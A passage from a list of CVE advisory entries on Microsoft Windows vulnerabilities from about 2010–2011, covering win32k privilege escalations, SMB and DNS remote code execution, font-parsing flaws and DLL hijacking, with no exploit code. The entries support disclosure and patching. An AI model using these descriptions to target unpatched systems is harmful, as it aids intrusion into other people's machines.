driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0674] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0673] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP3 allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k Null Pointer De-reference Vulnerability." [CVE-2011-0672] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0671] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0670] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0667] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0666] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0665] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0662] Use-after-free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows local users to gain privileges via a crafted application that leverages incorrect driver object management, a different vulnerability than other "Vulnerability Type 1" CVEs listed in MS11-034, aka "Win32k Use After Free Vulnerability." [CVE-2011-0661] The SMB Server service in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly validate fields in SMB requests, which allows remote attackers to execute arbitrary code via a malformed request in a (1) SMBv1 or (2) SMBv2 packet, aka "SMB Transaction Parsing Vulnerability." [CVE-2011-0660] The SMB client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote SMB servers to execute arbitrary code via a crafted (1) SMBv1 or (2) SMBv2 response, aka "SMB Client Response Parsing Vulnerability." [CVE-2011-0658] Integer underflow in the OLE Automation protocol implementation in VBScript.dll in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via a crafted WMF file, aka "OLE Automation Underflow Vulnerability." [CVE-2011-0657] DNSAPI.dll in the DNS client in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly process DNS queries, which allows remote attackers to execute arbitrary code via (1) a crafted LLMNR broadcast query or (2) a crafted application, aka "DNS Query Vulnerability." [CVE-2011-0654] Integer underflow in the BowserWriteErrorLogEntry function in the Common Internet File System (CIFS) browser service in Mrxsmb.sys or bowser.sys in Active Directory in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code or cause a denial of service (system crash) via a malformed BROWSER ELECTION message, leading to a heap-based buffer overflow, aka "Browser Pool Corruption Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2011-0638] Microsoft Windows does not properly warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. [CVE-2011-0627] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content, as possibly exploited in the wild in May 2011 by a Microsoft Office document with an embedded .swf file. [CVE-2011-0347] Microsoft Internet Explorer on Windows XP allows remote attackers to trigger an incorrect GUI display and have unspecified other impact via vectors related to the DOM implementation, as demonstrated by cross_fuzz. [CVE-2011-0096] The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability." [CVE-2011-0091] Kerberos in Microsoft Windows Server 2008 R2 and Windows 7 does not prevent a session from changing from strong encryption to DES encryption, which allows man-in-the-middle attackers to spoof network traffic and obtain sensitive information via a DES downgrade, aka "Kerberos Spoofing Vulnerability." [CVE-2011-0090] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2011-0089] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Improper Pointer Validation Vulnerability." [CVE-2011-0088] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Window Class Pointer Confusion Vulnerability." [CVE-2011-0087] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Insufficient User Input Validation Vulnerability." [CVE-2011-0086] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Improper User Input Validation Vulnerability." [CVE-2011-0045] The Trace Events functionality in the kernel in Microsoft Windows XP SP3 does not properly perform type conversion, which causes integer truncation and insufficient memory allocation and triggers a buffer overflow, which allows local users to gain privileges via a crafted application, related to WmiTraceMessageVa, aka "Windows Kernel Integer Truncation Vulnerability." [CVE-2011-0043] Kerberos in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 supports weak hashing algorithms, which allows local users to gain privileges by operating a service that sends crafted service tickets, as demonstrated by the CRC32 algorithm, aka "Kerberos Unkeyed Checksum Vulnerability." [CVE-2011-0042] SBE.dll in the Stream Buffer Engine in Windows Media Player and Windows Media Center in Microsoft Windows XP SP2 and SP3, Windows XP Media Center Edition 2005 SP3, Windows Vista SP1 and SP2, Windows 7 Gold and SP1, and Windows Media Center TV Pack for Windows Vista does not properly parse Digital Video Recording (.dvr-ms) files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DVR-MS Vulnerability." [CVE-2011-0041] Integer overflow in gdiplus.dll in GDI+ in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Office XP SP3 allows remote attackers to execute arbitrary code via a crafted EMF image, aka "GDI+ Integer Overflow Vulnerability." [CVE-2011-0040] The server in Microsoft Active Directory on Windows Server 2003 SP2 does not properly handle an update request for a service principal name (SPN), which allows remote attackers to cause a denial of service (authentication downgrade or outage) via a crafted request that triggers name collisions, aka "Active Directory SPN Validation Vulnerability." [CVE-2011-0039] The Local Security Authority Subsystem Service (LSASS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly process authentication requests, which allows local users to gain privileges via a request with a crafted length, aka "LSASS Length Validation Vulnerability." [CVE-2011-0037] Microsoft Malware Protection Engine before 1.1.6603.0, as used in Microsoft Malicious Software Removal Tool (MSRT), Windows Defender, Security Essentials, Forefront Client Security, Forefront Endpoint Protection 2010, and Windows Live OneCare, allows local users to gain privileges via a crafted value of an unspecified user registry key. [CVE-2011-0034] Stack-based buffer overflow in the OpenType Compact Font Format (aka OTF or CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 allows remote attackers to execute arbitrary code via crafted parameter values in an OpenType font, aka "OpenType Font Stack Overflow Vulnerability." [CVE-2011-0033] The OpenType Compact Font Format (CFF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly validate parameter values in OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted font, aka "OpenType Font Encoded Character Vulnerability." [CVE-2011-0032] Untrusted search path vulnerability in DirectShow in Microsoft Windows Vista SP1 and SP2, Windows 7 Gold and SP1, Windows Server 2008 R2 and R2 SP1, and Windows Media Center TV Pack for Windows Vista allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Digital Video Recording (.dvr-ms), Windows Recorded TV Show (.wtv), or .mpg file, aka "DirectShow Insecure Library Loading Vulnerability." [CVE-2011-0031] The (1) JScript 5.8 and (2) VBScript 5.8 scripting engines in Microsoft Windows Server 2008 R2 and Windows 7 do not properly load decoded scripts obtained from web pages, which allows remote attackers to trigger memory corruption and consequently obtain sensitive information via a crafted web site, aka "Scripting Engines Information Disclosure Vulnerability." [CVE-2011-0030] The Client/Server Run-time Subsystem (CSRSS) in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly kill processes after a logout, which allows local users to obtain sensitive information or gain privileges via a crafted application that continues to execute throughout the logout of one user and the login session of the next user, aka "CSRSS Elevation of Privilege Vulnerability," a different vulnerability than CVE-2010-0023. [CVE-2011-0028] WordPad in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly parse fields in Word documents, which allows remote attackers to execute arbitrary code via a crafted .doc file, aka "WordPad Converter Parsing Vulnerability." [CVE-2011-0027] Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka "ADO Record Memory Vulnerability." NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118. [CVE-2011-0026] Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka "DSN Overflow Vulnerability." [CVE-2010-5082] Untrusted search path vulnerability in colorcpl.exe 6.0.6000.16386 in the Color Control Panel in Microsoft Windows Server 2008 SP2, R2, and R2 SP1 allows local users to gain privileges via a Trojan horse sti.dll file in the current working directory, as demonstrated by a directory that contains a .camp, .cdmp, .gmmp, .icc, or .icm file, aka "Color Control Panel Insecure Library Loading Vulnerability." [CVE-2010-4701] Heap-based buffer overflow in the CDrawPoly::Serialize function in fxscover.exe in Microsoft Windows Fax Services Cover Page Editor 5.2 r2 in Windows XP Professional SP3, Server 2003 R2 Enterprise Edition SP2, and Windows 7 Professional allows remote attackers to execute arbitrary code via a long record in a Fax Cover Page (.cov) file. NOTE: some of these details are obtained from third party information. [CVE-2010-4669] The Neighbor Discovery (ND) protocol implementation in the IPv6 stack in Microsoft Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, and Windows 7 allows remote attackers to cause a denial of service (CPU consumption and system hang) by sending many Router Advertisement (RA) messages with different source addresses, as demonstrated by the flood_router6 program in the thc-ipv6 package. [CVE-2010-4562] Microsoft Windows 2008, 7, Vista, 2003, 2000, and XP, when using IPv6, allows remote attackers to determine whether a host is sniffing the network by sending an ICMPv6 Echo Request to a multicast address and determining whether an Echo Reply is sent, as demonstrated by thcping. NOTE: due to a typo, some sources map CVE-2010-4562 to a ProFTPd mod_sql vulnerability, but that issue is covered by CVE-2010-4652. [CVE-2010-4398] Stack-based buffer overflow in the RtlQueryRegistryValues function in win32k.sys in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges, and bypass the User Account Control (UAC) feature, via a crafted REG_BINARY value for a SystemDefaultEUDCFont registry key, aka "Driver Improper Interaction with Windows Kernel Vulnerability." [CVE-2010-4182] Untrusted search path vulnerability in the Data Access Objects (DAO) library (dao360.dll) in Microsoft Windows XP Professional SP3, Windows Server 2003 R2 Enterprise Edition SP3, Windows Vista Business SP1, and Windows 7 Professional allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse msjet49.dll that is located in the same folder as a file that is processed by dao360.dll. NOTE: the provenance of this information is unknown [CVE-2010-3974] fxscover.exe in the Fax Cover Page Editor in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly parse FAX cover pages, which allows remote attackers to execute arbitrary code via a crafted .cov file, aka "Fax Cover Page Editor Memory Corruption Vulnerability." [CVE-2010-3973] The WMITools ActiveX control in WBEMSingleView.ocx 1.50.1131.0 in Microsoft WMI Administrative Tools 1.1 and earlier in Microsoft Windows XP SP2 and SP3 allows remote attackers to execute arbitrary code via a crafted argument to the AddContextRef method, possibly an untrusted pointer dereference, aka "Microsoft WMITools ActiveX Control Vulnerability." [CVE-2010-3970] Stack-based buffer overflow in the CreateSizedDIBSECTION function in shimgvw.dll in the Windows Shell graphics processor (aka graphics rendering engine) in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted .MIC or unspecified Office document containing a thumbnail bitmap with a negative biClrUsed value, as reported by Moti and Xu Hao, aka "Windows Shell Graphics Processing Overrun Vulnerability." [CVE-2010-3967] Untrusted search path vulnerability in Microsoft Windows Movie Maker (WMM) 2.6 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Movie Maker (MSWMM) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3966] Untrusted search path vulnerability in Microsoft Windows Server 2008 R2 and Windows 7, when BranchCache is supported, allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains an EML file, an RSS file, or a WPOST file, aka "BranchCache Insecure Library Loading Vulnerability." [CVE-2010-3965] Untrusted search path vulnerability in Windows Media Encoder 9 on Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, and Windows Server 2008 Gold and SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a Windows Media Profile (PRX) file, aka "Insecure Library Loading Vulnerability." [CVE-2010-3963] Buffer overflow in the Routing and Remote Access NDProxy component in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a crafted application, related to the Routing and Remote Access service (RRAS) and improper copying from user mode to the kernel, aka "Kernel NDProxy Buffer Overflow Vulnerability." [CVE-2010-3961] The Consent User Interface (UI) in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly handle an unspecified registry-key value, which allows local users with SeImpersonatePrivilege rights to gain privileges via a crafted application, aka "Consent UI Impersonation Vulnerability." [CVE-2010-3960] Hyper-V in Microsoft Windows Server 2008 Gold, SP2, and R2 allows guest OS users to cause a denial of service (host OS hang) by sending a crafted encapsulated packet over the VMBus, aka "Hyper-V VMBus Vulnerability." [CVE-2010-3959] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted CMAP table in an OpenType font, aka "OpenType CMAP Table Vulnerability." [CVE-2010-3957] Double free vulnerability in the OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Double Free Vulnerability." [CVE-2010-3956] The OpenType Font (OTF) driver in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly perform array indexing, which allows local users to gain privileges via a crafted OpenType font, aka "OpenType Font Index Vulnerability." [CVE-2010-3944] win32k.sys in the kernel-mode drivers in Microsoft Windows Server 2008 R2 and Windows 7 does not properly validate user-mode input, which allows local users to gain privileges via a crafted application, aka "Win32k Memory Corruption Vulnerability." [CVE-2010-3943] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly link driver objects, which allows local users to gain privileges via a crafted application that triggers linked-list corruption, aka "Win32k Cursor Linking Vulnerability." [CVE-2010-3942] win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly allocate memory for copies from user mode, which allows local users to gain privileges via a crafted application, aka "Win32k WriteAV Vulnerability." [CVE-2010-3941] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold and SP2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k Double Free Vulnerability." [CVE-2010-3940] Double free vulnerability in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a crafted application, aka "Win32k PFE Pointer Double Free Vulnerability." [CVE-2010-3939] Buffer overflow in win32k.sys in the kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via vectors related to improper memory allocation for copies from user mode, aka "Win32k Buffer Overflow Vulnerability." [CVE-2010-3937] Microsoft Exchange Server 2007 SP2 on the x64 platform allows remote authenticated users to cause a denial of service (infinite loop and MSExchangeIS outage) via a crafted RPC request, aka "Exchange Server Infinite Loop Vulnerability." [CVE-2010-3889] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Microsoft researchers and other researchers. [CVE-2010-3888] Unspecified vulnerability in Microsoft Windows on 32-bit platforms allows local users to gain privileges via unknown vectors, as exploited in the wild in July 2010 by the Stuxnet worm, and identified by Kaspersky Lab researchers and other researchers. [CVE-2010-3338] The Windows Task Scheduler in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 does not properly determine the security context of scheduled tasks, which allows local users to gain privileges via a crafted application, aka "Task Scheduler Vulnerability." NOTE: this might overlap CVE-2010-3888. [CVE-2010-3324] The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scripting (XSS) protection mechanism and conduct XSS attacks via a crafted use of the Cascading Style Sheets (CSS) @import rule, aka "HTML Sanitization Vulnerability," a different vulnerability than CVE-2010-1257. [CVE-2010-3243] Cross-site scripting (XSS) vulnerability in the toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2 and Office SharePoint Server 2007 SP2, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "HTML Sanitization Vulnerability." [CVE-2010-3229] The Secure Channel (aka SChannel) security package in Microsoft Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when IIS 7.x is used, does not properly process client certificates during SSL and TLS handshakes, which allows remote attackers to cause a denial of service (LSASS outage and reboot) via a crafted packet, aka "TLSv1 Denial of Service Vulnerability." [CVE-2010-3227] Stack-based buffer overflow in the UpdateFrameTitleForDocument method in the CFrameWnd class in mfc42.dll in the Microsoft Foundation Class (MFC) Library in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows context-dependent attackers to execute arbitrary code via a long window title that this library attempts to create at the request of an application, as demonstrated by the Trident PowerZip 7.2 Build 4010 application, aka "Windows MFC Document Title Updating Buffer Overflow Vulnerability." [CVE-2010-3225] Use-after-free vulnerability in the Media Player Network Sharing Service in Microsoft Windows Vista SP1 and SP2 and Windows 7 allows remote attackers to execute arbitrary code via a crafted Real Time Streaming Protocol (RTSP) packet, aka "RTSP Use After Free Vulnerability." [CVE-2010-3223] The user interface in Microsoft Cluster Service (MSCS) in Microsoft Windows Server 2008 R2 does not properly set administrative-share permissions for new cluster disks that are shared as part of a failover cluster, which allows remote attackers to read or modify data on these disks via requests to the associated share, aka "Permissions on New Cluster Disks Vulnerability." [CVE-2010-3147] Untrusted search path vulnerability in wab.exe 6.00.2900.5512 in Windows Address Book in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 allows local users to gain privileges via a Trojan horse wab32res.dll file in the current working directory, as demonstrated by a directory that contains a Windows Address Book (WAB), VCF (aka vCard), or P7C file, aka "Insecure Library Loading Vulnerability." NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3143. [CVE-2010-3145] Untrusted search path vulnerability in the BitLocker Drive Encryption API, as used in sdclt.exe in Backup Manager in Microsoft Windows Vista SP1 and SP2, allows local users to gain privileges via a Trojan horse fveapi.dll file in the current working directory, as demonstrated by a directory that contains a Windows Backup Catalog (.wbcat) file, aka "Backup Manager Insecure Library Loading Vulnerability." [CVE-2010-3144] Untrusted search path vulnerability in the Internet Connection Signup Wizard in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges via a Trojan horse smmscrpt.dll file in the current working directory, as demonstrated by a directory that contains an ISP or INS file, aka "Internet Connection Signup Wizard Insecure Library Loading Vulnerability." [CVE-2010-3143] Untrusted search path vulnerability in Microsoft Windows Contacts allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse wab32res.dll that is located in the same folder as a .contact, .group, .p7c, .vcf, or .wab file. NOTE: the codebase for this product may overlap the codebase for the product referenced in CVE-2010-3147. [CVE-2010-3140] Untrusted search path vulnerability in Microsoft Windows Internet Communication Settings on Windows XP SP3 allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse schannel.dll that is located in the same folder as an ISP file. [CVE-2010-3138] Untrusted search path vulnerability in the Indeo Codec in iac25_32.ax in Microsoft Windows XP SP3 allows local users to gain privileges via a Trojan horse iacenc.dll file in the current working directory, as demonstrated by access through BS.Player or Media Player Classic to a directory that contains a .avi, .mka, .ra, or .ram file, aka "Indeo Codec Insecure Library Loading Vulnerability." NOTE: some of these details are obtained from third party information. [CVE-2010-2746] Heap-based buffer overflow in Comctl32.dll (aka the common control library) in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, when a third-party SVG viewer is used, allows remote attackers to execute arbitrary code via a crafted HTML document that triggers unspecified messages from this viewer, aka "Comctl32 Heap Overflow Vulnerability." [CVE-2010-2745] Microsoft Windows Media Player (WMP) 9 through 12 does not properly deallocate objects during a browser reload action, which allows user-assisted remote attackers to execute arbitrary code via crafted media content referenced in an HTML document, aka "Windows Media Player Memory Corruption Vulnerability." [CVE-2010-2744] The kernel-mode drivers in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly manage a window class, which allows local users to gain privileges by creating a window, then using (1) the SetWindowLongPtr function to modify the popup menu structure, or (2) the SwitchWndProc function with a switch window information pointer, which is not re-initialized when a WM_NCCREATE message is processed, aka "Win32k Window Class Vulnerability." [CVE-2010-2743] The kernel-mode drivers in Microsoft Windows XP SP3 do not properly perform indexing of a function-pointer table during the loading of keyboard layouts from disk, which allows local users to gain privileges via a crafted application, as demonstrated in the wild in July 2010 by the Stuxnet worm, aka "Win32k Keyboard Layout Vulnerability." NOTE: this might be a duplicate of CVE-2010-3888 or CVE-2010-3889. [CVE-2010-2741] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 performs an incorrect integer calculation during font processing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Validation Vulnerability." [CVE-2010-2740] The OpenType Font (OTF) format driver in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 does not properly perform memory allocation during font parsing, which allows local users to gain privileges via a crafted application, aka "OpenType Font Parsing Vulnerability." [CVE-2010-2739] Buffer overflow in the CreateDIBPalette function in win32k.sys in Microsoft Windows XP SP3, Server 2003 R2 Enterprise SP2, Vista Business SP1, Windows 7, and Server 2008 SP2 allows local users to cause a denial of service (crash) and possibly execute arbitrary code by performing a clipboard operation (GetClipboardData API function) with a crafted bitmap with a palette that contains a large number of colors. [CVE-2010-2738] The Uniscribe (aka new Unicode Script Processor) implementation in USP10.DLL in Microsoft Windows XP SP2 and SP3, Server 2003 SP2, Vista SP1 and SP2, and Server 2008 Gold and SP2, and Microsoft Office XP SP3, 2003 SP3, and 2007 SP2, does not properly validate tables associated with malformed OpenType fonts, which allows remote attackers to execute arbitrary code via a crafted (1) web site or (2) Office document, aka "Uniscribe Font Parsing Engine Memory Corruption Vulnerability." [CVE-2010-2731] Unspecified vulnerability in Microsoft Internet Information Services (IIS) 5.1 on Windows XP SP3, when directory-based Basic Authentication is enabled, allows remote attackers to bypass intended access restrictions and execute ASP files via a crafted request, aka "Directory Authentication Bypass Vulnerability." [CVE-2010-2568] Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems. [CVE-2010-2566] The Secure Channel (aka SChannel) security package in Microsoft Windows XP SP2 and SP3, and Windows Server 2003 SP2, does not properly validate certificate request messages from TLS and SSL servers, which allows remote servers to execute arbitrary code via a crafted SSL response, aka "SChannel Malformed Certificate Request Remote Code Execution Vulnerability." [CVE-2010-2564] Buffer overflow in Microsoft Windows Movie Maker (WMM) 2.1, 2.6, and 6.0 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted project file, aka "Movie Maker Memory Corruption Vulnerability." [CVE-2010-2563] The Word 97 text converter in the WordPad Text 